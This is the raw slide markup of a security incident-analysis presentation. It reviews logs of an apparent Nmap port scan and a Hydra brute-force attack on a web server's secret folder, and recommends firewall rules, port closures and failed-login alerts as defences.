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Nunito"/>
      <p:regular r:id="rId45"/>
      <p:bold r:id="rId46"/>
      <p:italic r:id="rId47"/>
      <p:boldItalic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35078E-5B90-48D3-9965-6337BCE00B8E}">
  <a:tblStyle styleId="{8935078E-5B90-48D3-9965-6337BCE00B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Roboto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regular.fntdata"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide24.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b3862c95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b3862c95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b3862c95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b3862c95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b3862c95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b3862c95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b3862c95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b3862c95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 name="Google Shape;52;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237100"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3" name="Google Shape;53;p13"/>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5" name="Shape 55"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Google Shape;56;p14"/>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 name="Google Shape;57;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="91440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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58" name="Google Shape;58;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 name="Google Shape;59;p14"/>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 name="Google Shape;60;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 name="Google Shape;61;p1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2" name="Google Shape;62;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="35817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 name="Google Shape;65;p15"/>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 name="Google Shape;66;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txBox="1"/>
          <p:nvPr>
            <p:ph idx="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71" name="Google Shape;71;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="6674700" cy="364800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="18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2" name="Google Shape;72;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1245800"/>
            <a:ext cx="6699600" cy="3897600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">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3" name="Google Shape;73;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7056300" y="910475"/>
            <a:ext cx="1814100" cy="3784800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="DBD9E8"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="182875" lIns="182875" spcFirstLastPara="1" rIns="182875" wrap="square" tIns="182875">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="10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74" name="Google Shape;74;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="0"/>
            <a:ext cx="6699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16"/>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 name="Google Shape;76;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7" name="Google Shape;77;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 name="Google Shape;78;p16"/>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79" name="Shape 79"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="80" name="Google Shape;80;p17"/>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81" name="Google Shape;81;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="0"/>
            <a:ext cx="9168600" cy="533700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="457200" spcFirstLastPara="1" rIns="274300" wrap="square" tIns="182875">
            <a:norm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 name="Google Shape;82;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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8607775" y="4957200"/>
            <a:ext cx="261900" cy="105600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>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lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="7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7"/>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88" name="Google Shape;88;p17"/>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90" name="Google Shape;90;p17"/>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95" name="Google Shape;95;p1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96" name="Google Shape;96;p1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274350" y="1703925"/>
            <a:ext cx="8595300" cy="79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2" name="Google Shape;102;p19"/>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rPr lang="en"/>
              <a:t>Stephen Guy - CySec Solutions, LLC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17" name="Google Shape;217;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1687275"/>
            <a:ext cx="8595300" cy="88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218" name="Google Shape;218;p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Identifying the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Google Shape;224;p29"/>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25" name="Google Shape;225;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1467800"/>
            <a:ext cx="8481900" cy="3448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226" name="Google Shape;226;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864225" y="675975"/>
            <a:ext cx="7758900" cy="818100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-161290" lvl="0" marL="320040" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>Port scan occurred on 6-May-2021 at approximately 02:10AM</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-161290" lvl="0" marL="320040" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>1002 packets were sent as part of a likely NMap scan by 192.168.1.8</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-161290" lvl="0" marL="320040" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>The sudden, drastic and immediate cessation of unsuccessful transactions indicates to me that this was an NMap scan</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="227" name="Google Shape;227;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="996225"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="228" name="Google Shape;228;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="446420" y="1543838"/>
            <a:ext cx="4708449" cy="2362675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="229" name="Google Shape;229;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4565025" y="2250975"/>
            <a:ext cx="4155527" cy="258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235" name="Google Shape;235;p3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36" name="Google Shape;236;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1559288"/>
            <a:ext cx="8409300" cy="3228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237" name="Google Shape;237;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="181200" y="678575"/>
            <a:ext cx="8595600" cy="743100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-154940" lvl="0" marL="320040" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Between 02:51AM and 02:55AM there were nearly 10K HTTP events involving the “secret_folder”. There were nearly 10K similar events again between 03:35AM and 03:37AM. Nearly all were performed by “Mozilla/4.0 (Hydra)”, a brute force tool.</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-154940" lvl="0" marL="320040" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>The folder in question, “company_folders/secret_folder/”, contained instructions outlining how Ashton was to log into the WebDAV tool in the corporate system using Ryan’s credentials.</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="238" name="Google Shape;238;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="47951" l="0" r="1671" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="423100" y="1615125"/>
            <a:ext cx="5633399" cy="2303749"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="239" name="Google Shape;239;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2536375" y="2690225"/>
            <a:ext cx="6196424" cy="205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245" name="Google Shape;245;p31"/>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46" name="Google Shape;246;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1467800"/>
            <a:ext cx="8409300" cy="33153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7" name="Google Shape;247;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="187125" y="810100"/>
            <a:ext cx="8061900" cy="533700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>In total, 19,957 requests were made, of which 19,940 were Hydra interactions.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Of the nearly 20K requests, 3 were successful (HTTP response code 301)</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="248" name="Google Shape;248;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="187125" y="835150"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="249" name="Google Shape;249;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4232475" y="2777150"/>
            <a:ext cx="4544176" cy="1985174"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="250" name="Google Shape;250;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1467825"/>
            <a:ext cx="6564526" cy="1253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256" name="Google Shape;256;p32"/>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57" name="Google Shape;257;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1467800"/>
            <a:ext cx="8409300" cy="34488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8" name="Google Shape;258;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410825" y="675975"/>
            <a:ext cx="9035100" cy="715500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-193040" lvl="0" marL="320040" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>There were 19,957 requests made of the secret_folder</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-193040" lvl="0" marL="320040" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>The only file requested was the “connect_to_corporate”</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="259" name="Google Shape;259;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="781187"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="260" name="Google Shape;260;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="410825" y="1512275"/>
            <a:ext cx="4888799" cy="1370100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="261" name="Google Shape;261;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2338650" y="2144500"/>
            <a:ext cx="6384174" cy="271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267" name="Google Shape;267;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1631275"/>
            <a:ext cx="8595300" cy="2026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268" name="Google Shape;268;p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Blocking the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Google Shape;274;p34"/>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75" name="Google Shape;275;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="30513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Blocking any IP address that is trying to connect to an unusually high number of ports on the network would defend against an NMap or any other type of active port scanning. </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>My recommendation would be to block any IP that scans more than 5 ports on the targeted IP address.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="Google Shape;276;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Making sure that only the necessary ports for legitimate data exchange with the network are left open. </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Verify that all other ports are either closed or otherwise non-discoverable.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>My </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>recommendation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> is to configure firewalld to leave port 80 accessible to incoming traffic and close the other ports that are potentially accessible by the public.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>I would also recommend blocking any IP addresses in regions of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> world where there is no business conducted with the company.</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Finding the Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Google Shape;282;p35"/>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83" name="Google Shape;283;p35"/>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Set an alarm to trigger when a series of failed login attempts occur on a single account or other access control point.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>My recommendation would be to set a maximum of 3 unsuccessful logins within a 10 minute period.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Google Shape;284;p35"/>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Using a Group Policy Editor rule or something similar to configure the exact access controls will allow the hardening efforts to be deployed across an entire network.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Further if the source IP is outside of the company network I would also suggest blocking that IP. </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
